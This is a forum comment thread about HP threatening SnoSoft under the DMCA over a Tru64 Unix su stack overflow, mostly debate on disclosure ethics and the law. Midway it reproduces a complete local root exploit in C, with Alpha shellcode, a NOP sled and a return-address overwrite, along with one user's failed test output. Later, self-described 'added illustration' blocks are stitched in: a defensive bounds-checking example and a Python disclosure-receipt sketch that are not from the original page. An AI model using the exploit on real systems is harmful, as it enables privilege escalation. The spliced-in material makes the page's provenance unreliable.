This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
Imagine...
You have a brand-new deadbolt lock installed on your front door.
A month later, a master key for your lock's exact model leaks out.
Every thief within a hundred miles has a key to your front door, they just have to notice that it fits to rob you blind.
Fortunately, a neighborhood watch group got wind of the leaked key, and started publicising it heavily, saving countless people from break-ins.
So who does the lock manufacturer go after, on learning of this problem?
Not the engineer who stupidly designed a master-keyed lock for the general public...
Not the thieves who make use of this information...
Not even the problem itself, which would take only a limited recall and almost no effort to correct...
Instead, they go after the neighborhood watch group, on some shaky grounds about loss of confidence in the company.
It strikes me as a *DAMNED* good thing that we only have such f'd up laws relating to computers, rather than physical security. Oh, wait, one *could* read the DMCA as applying to physical security. Oops. Time to go install a 2x4 on a latch-and-hinge across my front door.
Anyone know if this exploit would fit on a t-shirt?
Looks like the DMCA is being used to shake people down with threats of jail time just for exercising free speech. Very sad indeed. This is a stupid law that will be tough to correct. Now congress is being paid off to pass more stupid laws that are turning this country into a fascist state. It seems to me that McCain had it right with trying to get soft money banned.
These statements are probably obvious and redundant but I figured I would add another statement to the list. This is a question of freedom and educating the American public. The needs of the people outweigh the needs of the rich few.
Nah, don't worry about being bombed. The U.S. government only bombs poor countries, especially ones with deep water ports.
Gosh! An AC post with the subject "FUCK HP" gets moderated to +5 Insightful. I agree with this post, but it hardly so "Insightful" because it's too obvious to most readers here.
Just in case a few of us here don't know about him. You can find his homepage here, and in his bio you can find:
" Hewlett-Packard Corporation - 2000 to Present
Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."
So he's in position to speak up in this case.
Note: I don't know if it's redundant but I'm sure some people would like to know. I don't ask for any mod points.
Lots of people are going to be looking forward to your scoop on this (I among them). Good luck getting to the bottom of it, and hope your dinner wasn't spoilt by the news.
RE:Security warning draws DMCA threat - http://news.com.com/2100-1023-947325.html.
Due to the unethical and ill-advised measures you have taken against SnoSoft, I have lost faith in HP and will immediately stop using HP/Compaq products and services.
On top of that I will advise everyone else to do the same.
I will subsequently dump any and all HP shares.
You simply are not the kind I'd like to deal with nor support in any way.
Former customer and Carly fan...
not only can their CEO's cheat their shareholders
not only cannot their CEO's cheat their shareholders
How did this happen? What's the whole story? Inquiring trolls want to know!
The knowledge that su suffers from stack overflow is sufficient to allow the malicious to gain root access, without the source code - of which there appears to be three versions floating around. Squashing one doesn't appear sufficient to stop even the skiddies. I have one of those free-to-individuals Tru64 UNIX licenses, and guess what? Root access denial is not effective in preventing me from copying anything. If HP allows backups of this nebulous copyrighted information, then they have already subscribed to root access circumvention. Wait a minute, the CDROMs that Tru64 UNIX comes on aren't protected either, and mounted CDs don't default to root read only...
Maybe the best thing that could happen would be for HP/Compaq to file suit under the DMCA. Not the best thing for the DMCA mind you...
I just removed "HP-UX" and "Tru64" from my resume, and cancelled my unshipped order on an HP LaserJet. HP can have my business back 1 year after they retract their usage of the DMCA.
I dont see the point of taking HP to task for it. .. whoopdee doo.
.. what we need is a change in the law.
.. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.
.. why can't I do it with the applications I use and store my deeply personal information (from baby pictures to tax and health records) on?
It's a waste of time. Even if they back off
Please
Hackers can expose findings and report them to companies
Given the sad fact that all our politicians (not just in America but worldwide) are elected by money, maybe the following compromise can be reached:
a) Hackers who find vulnerabilities must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.
b) Companies that take no action (that is dont make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.
c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.
Is there any way for you to use your publicity to bring something like this about?
At least try. I hate the fact that curiosity is now a crime. I am allowed to take apart my car and see how it works
Thanks,
Johan
This is like the FBI arresting you for a felony because you found a dangerous subway stop in New York, and told everyone not to use it so they wouldn't get hurt!! It makes no sense! Reece,
There was already slim to no chance that I'd ever consider Tru64, but there goes any chance in hell that it'll be used on my servers. Good work HP.
I can see it here, the US Government is progressively inventing laws that ensure:
....Imagine, no violence, no crime, no hunger...a perfect world!
Only the Government can investigate crimes.
Only the Government can test, examine, uncover defects in consumer products
Only the Government can perform reverse engineering on anything
Only the Government is allowed to use top-grade encryption
The scope of Free Speech is defined by senators, and it happens that no constitutional rights are being intruded.
That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.
What's wrong with the picture? I don't know, but I've read a novel about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but laws.
IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed (brains were separated from their bodies) or terminated (become food for others). It's like The Matrix, but this time some humans control everything.
Lots of people consider America to be the freest country in the world. Rules regarding free speech in Europe are one of the reasons why most people don't consider European countries nearly as free. The DMCA is bad but at least at the core of our legal system we have a 1st amendment which prevents attempts at prior restraint, and so over the long term HP couldn't win this sort of thing. Europeans will never know that sort of security.
Don't say it...don't say it...I'm warning you...
Use Linux.
Damn, I said it.
Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.
<rant />
Clearly some sort of political action is required. I suggest:
1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House and Senate, rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.
2. Abolish corporate personhood (same methods).
3. Abolish the lobby industry.
4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.
We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...
I hope you can point them in the right direction, Bruce... and I hope whoever owns this defect has a patch out by tomorrow at noon. =) I know if I owned that code, and I saw this article, I'd be working night and day to get a resolution...
Of course, this is probably Compaq (a "wholly owned subsidiary" of HP) that we're talking about, so maybe my company isn't going to hell as fast as some might think.
Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.
HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.
HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix its products, our politicians need to re-examine that law.
I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
none of the less-than & greater-than signs made it through the filter :)
Look at the for loops
There are some truly dumb things in a standard install of Tru64 Unix that have been fixed for ages in Linux, *BSD, Solaris, etc. One thing in particular came up (and was fixed in Linux, etc.) in 1996! I pointed it out to someone at Compaq over six months ago and was told that it was being worked on, but two patchkits later, there's no change. They're adding some things, slowly, like a secure mkstemp command that was added to 5.1A with PK1. But overall, the reaction from Compaq (and now HP) to security problems is underwhelming at best.
This'll be great for Black Hats now their 0-day will stay 0-day even longer.
There won't need to be much use for the [initial-intent of the] DMCA, as give it another few years or less and the companies that follow actions such as those by HP won't have software worth copying anyway.
The DMCA clearly stifles 'innovation' in-key with a Microsoft Windows 98 installation on every new home computer.
Suddenly it becomes obvious that Apple don't need losers, black sheep and computer illiterate users to promote their products.
Likewise reporting a fault in SSH will give you a round of applause, and not a 5 year gaol/jail term and certain bankruptcy.
In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Bruce Perens.
Judge Kaplan didn't let EXCEPTIONS WRITTEN INTO THE DMCA ITSELF prevent him from ruling against the DeCSS defendants.
Don't count on judges to uphold the law.
(Unless of course, the side that is right is also the side with the most money - which is rarely the case)
Just because it CAN be done, doesn't mean it should!
Computers are now being used extensively in the medical field for everything from life-support, diagnosis, treatment, medical records and billing.
Hacks on billing systems will just cause financial damage, but hacks on the other types of systems CAN KILL.
Hacking SCADA and industrial control systems can KILL and/or cause MAJOR property and environmental damage.
Security holes can literally TAKE one's life.
Just because it CAN be done, doesn't mean it should!
I just tried that on a Tru64 box (after putting all the greater/less thans back in).
./get_root /bin/su by phasedA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ;-)A AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA@
It didn't work:
(snip!)>
payload 15120b
buffer 8238b
su: Unknown id: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
snip! - lameness filter
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Memory fault
(snip!)>
Here's the version of the box:
OSF1 *********.au V5.1 732 alpha
Suppose I've discovered a critical security flaw in Tru64. Under threat of the DMCA, I can't simply announce what this flaw is. Question 1: Who can I tell that I don't need permission from HP to do so?
:)
Now, the DMCA doesn't prohibit me from exercising my capitalistic itches, and I've written an (obviously third party) patch to this flaw. Question 2: The DMCA prevents me from telling how my patch works and what it does, and probably prevents me from releasing the source code to my patch, but does it prevent me from selling the patch for a great profit?
Question 3: Could I apply a license to the patch such that I was not responsible for any damage the patch does, and not culpable if the patch say, didn't do anything at all?
Question 4: Wouldn't the DMCA prevent anyone from (legally) discovering if the patch worked at all?
Question 5: Would this constitute "bad faith" in HP's eyes?
I understand how tempting it may be to walk away. To "make a statement" by walking away. Resist it. Teaching HP to be good open source citizens is, in many ways, like trying to raise a willful teenager. Just because you try to teach them right from wrong doesn't mean they will do the right thing every time. That doesn't make you a failure, and it doesn't mean they don't hear you and can't learn. The words you say can make an impact, year after year, if you let them. Your silence will be heard only for a moment, then forgotten.
Children pack up their toys and leave when they don't like the game. Mature adults recognise that sometimes the game goes against them, but if the game is important enough, you keep playing.
Hang in there - we need you there.
Watch what happens to HPQ tomorrow. I think that this news will be significantly negative for HPQ. Note that after Adobe filed charges against Sklyarov, the price of ADBE went down.
... and I don't even own any to begin with (I'm a short seller).
I know I'm going to be selling a few thousand shares of HPQ tomorrow
Once information regarding an exploit is published, its propagation is inevitable, especially among the "black hat community." While legitimate customers are legally forbidden to devise a workaround for this exploit, the script kiddies will soon be employing it.
Server administrators can only defend from vulnerabilities they're aware of. Loyal customers, not shareholders, should take precedence, Hewlett-Packard.
Do you like German cars?
/* Tru64 /bin/su stack overflow exploit as posted (return address 0x140010401). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* bzero() */
#include <unistd.h>

/* Alpha shellcode exactly as supplied by the poster. */
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

int main(int argc, char *argv[]) {
    int i, j;
    char buffer[8239];                  /* first su argument: filler + return address */
    char payload[15200];                /* second su argument: NOP sled + shellcode */
    char nop[] = "\x1f\x04\xff\x47";    /* Alpha nop: bis $31,$31,$31 */

    bzero(buffer, sizeof(buffer));
    bzero(payload, sizeof(payload));

    /* 8233 bytes of 'A', then 0x140010401 written little-endian; the
       remaining zero byte from bzero() terminates the string. */
    for (i = 0; i < 8233; i++)
        buffer[i] = 0x41;
    buffer[i++] = 0x01;
    buffer[i++] = 0x04;
    buffer[i++] = 0x01;
    buffer[i++] = 0x40;
    buffer[i++] = 0x01;

    /* 15000 bytes of 4-byte NOPs for the sled... */
    for (i = 0; i < 15000; ) {
        for (j = 0; j < 4; j++)
            payload[i++] = nop[j];
    }
    /* ...followed by the shellcode (its trailing NUL ends the payload string). */
    for (j = 0; j < (int)sizeof(shellcode); i++, j++)
        payload[i] = shellcode[j];

    printf("/bin/su by phased\n");
    printf("payload %db\n", (int)strlen(payload));
    printf("buffer %db\n", (int)strlen(buffer));
    execl("/usr/bin/su", "su", buffer, payload, (char *)NULL);
    return 1;   /* only reached if execl() fails */
}
The theory of relativity doesn't work right in Arkansas.
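The bug the posted exploit leans on is the usual one: su copies an attacker-controlled argument into a fixed-size stack buffer with no length check, so an oversized "id" runs over the saved return address. The following is an added illustration in C, not code from the page, from HP or from SnoSoft, and it does not model the real su: ID_MAX, lookup_unsafe(), lookup_safe() and reject_overlong_id() are all names and sizes assumed here for the example. The vulnerable shape is shown next to a hardened one that bounds the length before copying and refuses anything that does not fit, which is what turns the 8239-byte argument from a "Memory fault" into a clean error.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ID_MAX is an assumed limit for this illustration; the page never states the
 * real size of the buffer that su overruns. */
#define ID_MAX 256

/* Vulnerable shape: a fixed-size stack buffer filled from an untrusted
 * argument with no length check. An argument of ID_MAX bytes or more runs
 * past 'name' and over whatever sits above it on the stack (saved registers,
 * return address). Never call this with input you do not control. */
int lookup_unsafe(const char *id)
{
    char name[ID_MAX];
    strcpy(name, id);                 /* unbounded copy: this is the overflow */
    return (int)strlen(name);
}

/* Hardened shape: measure at most 'outsz' bytes, refuse an id that has no
 * terminator within the buffer, and only then copy. Returns the copied
 * length, or -1 for an id that is too long. */
int lookup_safe(const char *id, char *out, size_t outsz)
{
    size_t n = 0;
    while (n < outsz && id[n] != '\0')   /* bounded length scan */
        n++;
    if (n >= outsz)                      /* no NUL inside outsz bytes: reject */
        return -1;
    memcpy(out, id, n + 1);              /* n + 1 carries the terminator */
    return (int)n;
}

/* A short id round-trips unchanged: returns its length, or -1 on mismatch. */
int short_id_roundtrip(void)
{
    char out[ID_MAX];
    int n = lookup_safe("root", out, sizeof out);
    return (n == 4 && strcmp(out, "root") == 0) ? n : -1;
}

/* Constructed 8239-byte id, the size the posted exploit builds, handed to
 * the hardened version: it must be refused, not written past 'out'. */
int reject_overlong_id(void)
{
    char out[ID_MAX];
    size_t len = 8239;
    char *big = malloc(len + 1);
    int r;
    if (big == NULL)
        return -2;
    memset(big, 'A', len);
    big[len] = '\0';
    r = lookup_safe(big, out, sizeof out);
    free(big);
    return r;
}

int main(int argc, char *argv[])
{
    char out[ID_MAX];
    const char *id = (argc > 1) ? argv[1] : "root";

    if (lookup_safe(id, out, sizeof out) < 0) {
        fprintf(stderr, "su: id too long (%zu bytes, limit %d)\n",
                strlen(id), ID_MAX - 1);
        return 1;
    }
    printf("looking up id '%s' (%d bytes)\n", out, (int)strlen(out));
    printf("8239-byte id rejected: %s\n",
           reject_overlong_id() == -1 ? "yes" : "no");
    return 0;
}
```

Run it with a long argument, for example the output of `perl -e 'print "A" x 8239'`, and the hardened path reports the length and exits instead of faulting. The check that matters is the one made before the copy: strlen() on the input alone is not enough, because a missing terminator makes strlen() itself read out of bounds, which is why the scan is capped at the destination size.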
They defend themselves the best they can
The American Way is about hypocrisy, and kickbacks for corrupt politicians (Fritz Hollings et al) and major automobile manufacturers
Algorithm for breaking into HP boxen:
1) take the system administrator to the pub
2) give him lots of beer
3) ask him the root password
4) go 'crack' the machine
Actually things like this are good - they demonstrate the stupidity of the DMCA and may aid its demise.
In these days, the main power of the proprietary Unix operating systems (like HP-UX, Irix, Tru64, AIX, and so on) is that they are highly optimized for the hardware they run on. Although you probably can run *BSD or Linux on most of these platforms, they are still inferior products. On the other hand, those operating systems (and the only exception is Solaris) are old dinosaurs, with ugly configurations so different from one vendor to the other, bad C compilers, strange filesystem layout. From the productivity point of view, running only one operating system on all platforms, if possible, is the best thing you can do. And when you know that your great vendor might leave you unpatched for months without even telling you, this is the best reason to abandon those operating systems in favour of *BSD or Linux. The sad part is that there might be some closed-source application that can only run on that Unix and not on your favourite free operating system, but for many other environments, HP just pushed everyone away from their operating systems.
I wonder if this is their official policy from now on, or if it is just related to Tru64 to make everyone switch to HP-UX, where they might still let you find and publish vulnerabilities?
From the article:
"HP hereby requests that you cooperate with us to remove the buffer overflow exploit from Securityfocus.com and to take all steps necessary to prevent the further dissemination by SnoSoft and its agents of this and similar exploits of Tru64 Unix," Ferson wrote, according to a copy of the letter seen by CNET News.com. "If SnoSoft and its members fail to cooperate with HP, then this will be considered further evidence of SnoSoft's bad faith."
How about this:
"SnoSoft hereby requests that you cooperate with us to remove the buffer overflow exploit from Tru64 Unix and to take all steps necessary to prevent the further dissemination by HP and its agents of this and similar exploits of free speech,"
"If HP and its members fail to cooperate with SnoSoft, then this will be considered further evidence of HP's bad faith."
"What difference does it make who finds and reports a bug?"
We lost a great deal of medical knowledge after WWII when we threw out the data gathered by Dr. Josef Mengele. This medical knowledge was the result of human experimentation on prisoners; some of it will remain lost until someone repeats the unethical human experiments involved.
So in answer: it has *always* mattered what source information; the ends never justify the means.
"The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself."
In this case, it did not. It spoke for a security consulting company, where the publisher of the exploit was a principal. If the exploit had merely spoken for itself, then we wouldn't be having this discussion, because HP would not have had a name to which it could attach their threat of a lawsuit.
The ends in this case were not even knowledge: they were commercial gain. Knowledge was just a side effect of the process of obtaining the commercial gain. If the commercial gain could have been obtained without the exposure of the security flaw, then there likely would not have been an exposure at all.
Am I glad the vulnerability was exposed? Yes.
Do I think HP is playing CYA? Yes.
Do I think the person who exposed the vulnerability acted ethically, as I would expect a legitimate security researcher to act? No.
-- Terry
Okay, what's to keep one company from slandering another company without any proof? What if Corp A announces that they have found a very destructive hole in Corp B's software, rendering it totally open to attack, but Corp A cannot release this information because of the DMCA.
Stay with me here: What if there is no vulnerability? Even if Corp B asks Corp A to do so, Corp A can (correctly) claim that they are not allowed to release the information under DMCA. Corp B can't find the vulnerability to fix it. Corp B cannot effectively defend its reputation because the exact charges are not known.
- oakbox
Not just answers, the correct questions.
Perhaps the answer to these draconian laws is to force their hand and have them start jailing large numbers of people for trivial stuff. How long before the politicians start to see that they have helped no one with these laws?
It appears that HP has truly gone over to the Dark Side.
One can see many parallels between Anakin and Carly...wonder how she looks in black.
We need a DMCA database that lists companies who invoked / threatened with the DMCA, and specifics about it. That way, we could simply query whom to boycott. Sort of like ORBS for DMCA Companies. (We do need to have the details listed for every case because the dmca might be invoked in legitimate cases like software piracy, too.)
me too! right on! vote with your dollars, fight the good fight. you ain't missing much: most movies stink and there isn't much good music coming out these days.
no movies, no CDs, no meat, no god - no guilt
My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.
How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?
nice... the old, infamous method of Security through Obscurity has been replaced with a new, much safer one -- Security through DMCA. Way to go!
Anyone who stores copyrighted material on a Tru64 system, and is counting on the system as a technological measure to control access to their work, can sue Snosoft for violating DMCA.
Alan Cox wasn't worried about Linus or someone else on the kernel team suing him. It's the millions of other people who use Linux, that he can't afford to trust.
So even if HP backs down, Snosoft's people aren't necessarily out of the woods. Realistically, they probably are. But they can't be 100% sure. That's how bad this law is.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
You must publish a working exploit, or the company will just say "that security hole is only theoretical", and blow off the entire thing. Publishing only the details of a security hole has been tried many times, and almost every time, the vendor has said "we aren't going to bother to fix that, it is only a theoretical vulnerability".
I wonder if the slashdot effect applies to telephone numbers too. = ]
I recommend on about $2-5m IT purchases a year. If we all tell Carly (in nice positive ways) how much this stupid decision is going to cost them, they'll hopefully see the light, and give up. This is a shame, as I've personally been a HP owner since 1995 and had exemplary service from them for the longest time. Compaq on the other hand has been busy screwing customers of mine since 1990. Their "service" was and always has been a joke where I live. When we paid a large wad of cash in 1997 for a bunch of Digital gear, well, Compaq bought them. I knew then we had signed a multi-million dollar mistake.
....
But I have no doubt now that they've threatened a lawsuit, a lawsuit we will have. Hopefully, it'll clear up the boundaries of the awful DCMA.
Anyway, HP, here's my "fuck you":
1997: $4,000,000 (at least - a huge deal)
1998: $1,000,000 (mostly desktops, changed from CPQ to HP cos I liked HP)
1999: $4,500,000 (start of a nice juicy project)
2000: $7,500,000 (the tail end of nice juicy project)
2001: a tiny bit less than $2,000,000
2002: $3,500,000 (so far)
2003: ?
2004: ?
2005: ?
2006: ?
2007: ?
2008: ?
2009: ?
2010: ?
2011: ?
2012: ?
2035: ?
2036: I retire.
Remember, HP, good friends are hard to come by, enemies are forever.
Andrew
Andrew van der Stock
I have long detested HP for the way they do things...Overly insular in technology and availability of information, stodgy os's that are slowing down, tight grip on coding, you name it...Since IBM went on their linux kick(truly only for their bottom line, they have no souls to save and never do something because it is right....in reality) I have seen a huge increase in the number of purchases at our company of their equipment, we have basically discarded HP and Comcrap, and I feel the load lifting. Now if we can dump all those DELLS that some moron purchased......
Probably because the EU has no "First Amendment"
We may not have it, but we have the European Court of Human Rights, which can be seized by any citizen (EU or not) and have his/her rights enforced. This court just sticks to the Declaration of Human Rights, which include free speech and plenty of other goodies absent from the US constitution. Even nazi sh*ts are granted rights their countries denied them on behalf of "hate speech" laws and such.
I also believe we, Europeans, enjoy a pretty nice form of freedom, perhaps even more than the citizens of the USofA. At least I don't risk much being shot by a gun-toting neighbour who thinks I'm a terrorist because I speak a foreign language or have friends from diverse ethnic backgrounds.
It's about time you Americans stop thinking Europe is some sort of communist dictatorship... Because from here, the USA sure doesn't look like the place to be if one wants to be free!
Just my 0.02
-max
-- It's always darker before it goes pitch black.
True, this is on a product that the company undoubtedly wants to retire as soon as possible, but the message this is sending about its priorities goes considerably wider.
I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.
-- Matthew - matthew.gream@pobox.com, http://matthewgream.net
HP can turn this thing around, by coming up with a serious and community accepted solution to this huge mess that has emerged from the DMCA.
.. wouldnt they be in real trouble?
First (and this may be a harder/difficult plan), they can say they had no choice but to under the DMCA. (this will undermine the DMCA's role as a credible piece of legislature while allowing HP to save face). Any major company that exposes the DMCA for its true worth is a friend of mine for life.
Second, and most importantly, they can take the initiative and launch an independent non profit system associated with Bugtraq or CERT by which hackers can properly submit vulnerabilities viewable to a select community group. The group can then determine whether and when to go public with the information provided the targeted company has reasonable time to prepare and announce a patch. All submittals to the consortium must be given a digitally signed receipt. If the bug report is swept under the rug.. and an exploit is released to the wild, the bug reporter can submit his receipt as evidence that the company at fault chose to ignore a known fault in their product.
If software companies want their rights to be protected they have to take responsibility. If a flaw is found in a GM vehicle, and they don't issue a recall or give free repairs
This level of accountability has GOT to be enforced in the software industry. (When was the last time you heard of a recall in the software industry? God knows it's been needed countless times)
Nobody can be held legally or criminally liable for unintentional flaws in their product, but refusal to take action should be firmly dealt with.
If a company is deliberately refusing to fix a known vulnerability in their product (merely to avoid PR hassles) they are endangering the US economy, shareholder interests, and perhaps even lives. This sort of reckless behavior is all too common in the software industry.
If HP comes out with a solution for handling security flaws, I believe it will work in their favor. Remember many software flaws are found in their competitor from Redmond's products.
Argh I don't know the point of saying this on slashdot. Like Ms. Fiorina will read this. Nothing said here ever results in any sort of action. Well ok maybe with the exception of freeing Dmitry Sklyarov. Legislation like DMCA pass with no opposition. Basically, geek views are treated like being less than 1/425'th of what the population wants.
Sigh.
-Johan
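The signed-receipt idea in the post above (a coordinator acknowledges each submitted report so the reporter can later prove when the vendor was notified) can be sketched in a few lines. This is an added example, not code from the original thread or from CERT or any coordinator; the coordinator key, reporter and vendor names, report text and 30-day grace period are all constructed, and it uses an HMAC with a coordinator-held secret where a real system would use a public-key signature so that anyone, not only the coordinator, can verify a receipt.

```python
import hashlib
import hmac
import json
from datetime import datetime, timedelta, timezone

# Constructed coordinator secret. Assumption: a real coordinator would sign
# receipts with an asymmetric key so third parties can verify them offline.
COORDINATOR_KEY = b"constructed-coordinator-secret-do-not-reuse"

# Constructed sample report; the receipt commits to its hash, not its text,
# so the report itself can stay private during the grace period.
SAMPLE_REPORT = (
    b"Product: ExampleOS 1.0 (constructed)\n"
    b"Issue: unchecked length when copying a command-line argument\n"
    b"Impact: local privilege escalation\n"
)


def report_digest(report: bytes) -> str:
    """SHA-256 of the full report as a hex string."""
    return hashlib.sha256(report).hexdigest()


def _canonical(fields: dict) -> bytes:
    """Deterministic serialization so issuer and verifier MAC the same bytes."""
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def issue_receipt(key: bytes, reporter: str, vendor: str, product: str,
                  report: bytes, received_at: datetime, grace_days: int = 30) -> dict:
    """Coordinator side: bind reporter, vendor, report hash and time under a MAC."""
    fields = {
        "reporter": reporter,
        "vendor": vendor,
        "product": product,
        "report_sha256": report_digest(report),
        "received_at": received_at.isoformat(),
        "grace_days": grace_days,
    }
    mac = hmac.new(key, _canonical(fields), hashlib.sha256).hexdigest()
    return {**fields, "mac": mac}


def verify_receipt(key: bytes, receipt: dict, report: bytes) -> bool:
    """Check the MAC over every field and that the report matches the hash.

    Any edit to the receipt (e.g. a backdated timestamp) or a different
    report text makes this return False.
    """
    fields = {k: v for k, v in receipt.items() if k != "mac"}
    expected = hmac.new(key, _canonical(fields), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, receipt.get("mac", "")):
        return False
    return hmac.compare_digest(fields["report_sha256"], report_digest(report))


def disclosure_due(receipt: dict) -> str:
    """Earliest date (ISO 8601) after which the group may publish the report."""
    received = datetime.fromisoformat(receipt["received_at"])
    return (received + timedelta(days=receipt["grace_days"])).isoformat()


def sample_receipt() -> dict:
    """Issue a receipt for the constructed report, dated 2002-07-18 UTC."""
    return issue_receipt(COORDINATOR_KEY, "reporter@example.invalid",
                         "ExampleVendor", "ExampleOS 1.0", SAMPLE_REPORT,
                         datetime(2002, 7, 18, tzinfo=timezone.utc))


if __name__ == "__main__":
    r = sample_receipt()
    print(json.dumps(r, indent=2))
    print("valid:", verify_receipt(COORDINATOR_KEY, r, SAMPLE_REPORT))
    print("tampered report valid:",
          verify_receipt(COORDINATOR_KEY, r, SAMPLE_REPORT + b"\n"))
    print("disclosure allowed after:", disclosure_due(r))
```

The reporter keeps the receipt and the original report bytes; if the vendor later claims it was never told, the coordinator (or, with a real signature, anyone holding the coordinator's public key) can recompute the MAC and the hash and confirm both the date and that exactly this report was submitted.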
What would the effect of an EULA stating that
"I as a copyright holder have no right to use _appalling_legislation_ against any person or entity using this software"
Would that be a stupid thing to do or is it not even possible.
That could, at least in the long run, become some sort of an incentive for customers to use my software (granted it's any good), or am I wrong?
No, not really.
;)
It's a niche OS, so it gets less publicity than most other OS's - Solaris, Debian etc.. - so there are possibly fewer known OS specific issues, but the vast majority of the bugs and loopholes that affect other un*x systems affect Tru64 as well thanks to the amount of shared code involved. Tru64 is no more or less vulnerable to bof's and other security issues than any other OS ( except maybe OpenBSD et al that are designed to be secure).
Having said all that it's pretty obvious that HP/Compaq want rid of it, so migrating to a new platform is prolly a good idea anyway
The DMCA is a law that is not enforceable outside of US boundaries, since the internet is international, and it is causing huge problems to the open software industry.
HP is one example where instead of fixing a high risk security bug, it decides to use the law to hide the bug and leave their customers' computers at the risk of the security hole; then I guess the way the law works is that HP customers can sue HP for selling defective software and hiding its bugs.
But this is nonsense, the correct way and ethical way to proceed is to fix the bug, don't use the DMCA as a method of hiding the bugs, and let people know about the security problem so that they fix the bug as soon as a fix becomes available if it does.
The DMCA is a law that needs to be overthrown, same as the DRM laws that legislators are trying to pass.
